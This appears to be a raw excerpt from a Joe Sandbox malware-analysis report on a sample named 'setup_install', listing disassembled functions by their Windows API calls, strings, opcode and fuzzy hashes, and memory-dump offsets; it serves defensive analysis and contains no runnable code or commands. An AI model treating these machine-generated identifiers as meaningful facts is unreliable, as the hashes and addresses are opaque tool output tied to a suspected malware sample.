                                        • Opcode ID: 163811b688975c9dd78eabbfcf878f230e2cc167fea6145db6e62a800b587d53
                                        • Instruction ID: f17c938f5f1025bd67bfc01c8bd0fa7bac11bb181cc9b4486b0677e15f3fb1f4
                                        • Opcode Fuzzy Hash: 163811b688975c9dd78eabbfcf878f230e2cc167fea6145db6e62a800b587d53
                                        • Instruction Fuzzy Hash: 07615D716082428BDB11CF28C0843A97BE1AFA5304F1985BEECC99F387D7799885DB55
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Time$FileSystem_errno
                                        • String ID:
                                        • API String ID: 3586254970-0
                                        • Opcode ID: d2752db180c2df1a463fce0996d50e30443b6d00ce03af71adc565c5a0394bf3
                                        • Instruction ID: daced355077f407e99694e3cb6d2ce24619376429e95316976637ccb96c1ab6a
                                        • Opcode Fuzzy Hash: d2752db180c2df1a463fce0996d50e30443b6d00ce03af71adc565c5a0394bf3
                                        • Instruction Fuzzy Hash: 06419271A547188BDB14AF79C98425EFBF9FF85320F11C66AE8A897390D730E9048F81
                                        APIs
                                        • GetHandleInformation.KERNEL32 ref: 649469E3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: HandleInformation
                                        • String ID:
                                        • API String ID: 1064748128-0
                                        • Opcode ID: 2e2f61b1dd8639c77616c9bda67c8e4cf7ccc1a4fb5a5ad7a018274efe07c6ce
                                        • Instruction ID: dc4b27d07541621448e8b39a046eaf3cca54107ef609da23971f61619de46343
                                        • Opcode Fuzzy Hash: 2e2f61b1dd8639c77616c9bda67c8e4cf7ccc1a4fb5a5ad7a018274efe07c6ce
                                        • Instruction Fuzzy Hash: CD411AB0A842148BEB00EFA8D58469EBBF8BF54358F018469DD84DB345E735DC54CBA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: $ : $new
                                        • API String ID: 1004003707-2075650739
                                        • Opcode ID: 54a1f3b15e75e556ae4a08526f45cbc04c2a4a9daa3f8f8e4c0536ad089c2286
                                        • Instruction ID: e896db53eea95867ced8d68fa916d1d81f60a93489210ad328088d3cd8166fcc
                                        • Opcode Fuzzy Hash: 54a1f3b15e75e556ae4a08526f45cbc04c2a4a9daa3f8f8e4c0536ad089c2286
                                        • Instruction Fuzzy Hash: 08511935604205CFCB00DF29C49469AB7A2EF88314F15857AEC89AF386C778ED49CBC6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Value
                                        • String ID:
                                        • API String ID: 3702945584-0
                                        • Opcode ID: 33b88b8834fbe6f3c0af159b5a4f999a2b4467097efc515ec244bf0800c5cbf9
                                        • Instruction ID: 865464317089b01d0c3e25b9b84e2bc077b12f70de8e178a61d5b24cc6745f97
                                        • Opcode Fuzzy Hash: 33b88b8834fbe6f3c0af159b5a4f999a2b4467097efc515ec244bf0800c5cbf9
                                        • Instruction Fuzzy Hash: 1A31F5716882105BEB00AFF8E88829FBFA9FF55378F500669DA948B245E730D550CBD2
                                        APIs
                                        • IsDBCSLeadByteEx.KERNEL32 ref: 00411944
                                        • MultiByteToWideChar.KERNEL32 ref: 00411987
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: Byte$CharLeadMultiWide
                                        • String ID:
                                        • API String ID: 2561704868-0
                                        • Opcode ID: b38872788fdc4de985e96dea8950f440029120fd2e3aaf9adedd6c317788392b
                                        • Instruction ID: af85ae3eab4a50405ded313cbf3432a8e92160208b3caed7d899386cf6b2ea23
                                        • Opcode Fuzzy Hash: b38872788fdc4de985e96dea8950f440029120fd2e3aaf9adedd6c317788392b
                                        • Instruction Fuzzy Hash: 7C4115B05093418BD710DF28D49439BBBE0BF85354F04895EE9A48B3A1D77AD889CB47
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: QCJ$]
                                        • API String ID: 1004003707-3553567308
                                        • Opcode ID: 78f0943e3628e5689b910b50437b9676bbb2ba2166c1b7587110eccc59a692d6
                                        • Instruction ID: ad0e07d3056260a8657f94a9da1a2b18de45625cd502e455eb8b3b39b7363af8
                                        • Opcode Fuzzy Hash: 78f0943e3628e5689b910b50437b9676bbb2ba2166c1b7587110eccc59a692d6
                                        • Instruction Fuzzy Hash: 19411334204205CFCB10DF28C4847DABBE1EF59318F0985BAEC889F356C3B9A884DB95
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Handle$Close$InformationObjectSingleWait
                                        • String ID:
                                        • API String ID: 135186658-0
                                        • Opcode ID: a2f56fa6dcfd30a06bde27e87b22150673c4bf3aeb029c00b4c2007235ce4296
                                        • Instruction ID: 242a5a580e1d973c92ae3d0649bd098013b5281b1da3015ced89c91361213ba7
                                        • Opcode Fuzzy Hash: a2f56fa6dcfd30a06bde27e87b22150673c4bf3aeb029c00b4c2007235ce4296
                                        • Instruction Fuzzy Hash: 113124B0A443048BEF00EFA9D58479ABBF8AF49324F009569EC54DB345E738D814CFA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: callocfree
                                        • String ID: $
                                        • API String ID: 306872129-3993045852
                                        • Opcode ID: 8dd0efe56fb1d39f75cad6a02fc2287d3ba24b0852c37a67afbf16ba018f610a
                                        • Instruction ID: e8fd12c27b18095d7dbd431d6828c7af7e938401ab3f4da3a68f00a934616eb4
                                        • Opcode Fuzzy Hash: 8dd0efe56fb1d39f75cad6a02fc2287d3ba24b0852c37a67afbf16ba018f610a
                                        • Instruction Fuzzy Hash: EE318FB1A847019BE300DF25C18871AFFF4BF86394F444A2DE89887740E735E860CBA2
                                        APIs
                                        • calloc.MSVCRT ref: 649430DF
                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,64943212), ref: 6494312C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: callocfree
                                        • String ID:
                                        • API String ID: 306872129-0
                                        • Opcode ID: 154b97607bde053c75abbe7044b994ad0f82899e5a037b8120ea47c855b98287
                                        • Instruction ID: 9c193dc7c97605ab8bbaeedd558f3df8b4fe68065e48fb78a270ff64f86154a5
                                        • Opcode Fuzzy Hash: 154b97607bde053c75abbe7044b994ad0f82899e5a037b8120ea47c855b98287
                                        • Instruction Fuzzy Hash: AF318D71A843059FEB209F39C44478EBBF8EF89368F108929E9A8C7740E735D444CB92
                                        APIs
                                        • calloc.MSVCRT ref: 649438BD
                                        • free.MSVCRT(?,?,?,00000000,?,?,649439E0), ref: 6494394B
                                        • free.MSVCRT(?,?,?,00000000,?,?,649439E0), ref: 6494396F
                                          • Part of subcall function 64941E00: calloc.MSVCRT ref: 64941E3A
                                          • Part of subcall function 64941E00: CreateSemaphoreA.KERNEL32 ref: 64941E8E
                                          • Part of subcall function 64941E00: CreateSemaphoreA.KERNEL32 ref: 64941EB5
                                          • Part of subcall function 64941E00: InitializeCriticalSection.KERNEL32 ref: 64941ED4
                                          • Part of subcall function 64941E00: InitializeCriticalSection.KERNEL32 ref: 64941EDF
                                          • Part of subcall function 64941E00: InitializeCriticalSection.KERNEL32 ref: 64941EEA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalInitializeSection$CreateSemaphorecallocfree
                                        • String ID:
                                        • API String ID: 1811228352-3916222277
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$_fileno_lseeki64
                                        • String ID:
                                        • API String ID: 2364285915-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Time$System_errno$File
                                        • String ID:
                                        • API String ID: 2046127076-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: __dllonexit_lock_onexit_unlock
                                        • String ID:
                                        • API String ID: 209411981-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentThreadprintf
                                        • String ID:
                                        • API String ID: 2356641437-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentThreadprintf
                                        • String ID:
                                        • API String ID: 2356641437-0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlenwcslen
                                        • String ID: (null)$(null)
                                        • API String ID: 803329031-1601437019
                                        APIs
                                        • pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00496F3F), ref: 004114AA
                                        • pthread_once.LIBWINPTHREAD-1 ref: 004114EF
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004114FB
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411512
                                        • calloc.MSVCRT ref: 00411531
                                        • pthread_setspecific.LIBWINPTHREAD-1 ref: 0041154E
                                        • realloc.MSVCRT ref: 004115DE
                                        • memset.MSVCRT ref: 0041160B
                                        • pthread_setspecific.LIBWINPTHREAD-1 ref: 0041161C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_setspecific$callocmemsetpthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_oncerealloc
                                        • String ID:
                                        • API String ID: 2529906858-0
                                        APIs
                                          • Part of subcall function 004806B0: pthread_once.LIBWINPTHREAD-1 ref: 004806C2
                                        • pthread_mutex_lock.LIBWINPTHREAD-1(?,?,?,?,0048E0D7,?,?,?,?,?,?,?,?,0048F940), ref: 004829DB
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1(?,?,?,?,0048E0D7,?,?,?,?,?,?,?,?,0048F940), ref: 004829F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID: lpJ
                                        • API String ID: 3726264613-129645102
                                        APIs
                                          • Part of subcall function 004014C0: _onexit.MSVCRT ref: 004014CA
                                          • Part of subcall function 00485FA0: strlen.MSVCRT ref: 00485FBC
                                        • _ZN6curlpp7CleanupC1Ev.LIBCURLPP ref: 00402E1D
                                        • _ZN6curlpp4EasyC1Ev.LIBCURLPP ref: 00402E33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CleanupEasyN6curlpp4N6curlpp7_onexitstrlen
                                        • String ID: D#J
                                        • API String ID: 1395134712-2691834849
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • fprintf.MSVCRT ref: 649437CD
                                        • exit.MSVCRT ref: 649437D9
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$exitfprintf
                                        • String ID: )
                                        • API String ID: 24197342-2427484129
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: fprintf
                                        • String ID: @YJ$Unknown error
                                        • API String ID: 383729395-4080997006
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: strerrorstrlen
                                        • String ID: (null)
                                        • API String ID: 960536887-3941151225
                                        APIs
                                        • free.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,64945D2F,?,?,?,?,00000000), ref: 64944B6D
                                        • free.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,64945D2F,?,?,?,?,00000000), ref: 64944B7C
                                        • free.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,64945D2F,?,?,?,?,00000000), ref: 64944C4F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                        • EnterCriticalSection.KERNEL32 ref: 64942864
                                        • LeaveCriticalSection.KERNEL32 ref: 64942880
                                          • Part of subcall function 64941A70: EnterCriticalSection.KERNEL32 ref: 64941A84
                                          • Part of subcall function 64941A70: LeaveCriticalSection.KERNEL32 ref: 64941AAB
                                        • LeaveCriticalSection.KERNEL32 ref: 649428E3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$Enter
                                        • String ID:
                                        • API String ID: 2978645861-0
                                        APIs
                                        • EnterCriticalSection.KERNEL32(-0000001E,?,?,64943E7B), ref: 6494250A
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,64943E7B), ref: 64942534
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        APIs
                                        • EnterCriticalSection.KERNEL32 ref: 6494262A
                                        • LeaveCriticalSection.KERNEL32 ref: 64942654
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        APIs
                                        • Sleep.KERNEL32(?,?,?,00000000,0041B019), ref: 0041AE47
                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,0041B019), ref: 0041AE78
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalEnterSectionSleep
                                        • String ID:
                                        • API String ID: 3080175056-0
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D350
                                        • InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D35C
                                        • EnterCriticalSection.KERNEL32(?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D384
                                        • Sleep.KERNEL32(?,?,00000000,?,6494D46A,?,?,?,?,?,?,6494D088), ref: 6494D3B7
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Initialize$EnterSleep
                                        • String ID:
                                        • API String ID: 1117354567-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeavefree
                                        • String ID:
                                        • API String ID: 4020351045-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                        • String ID:
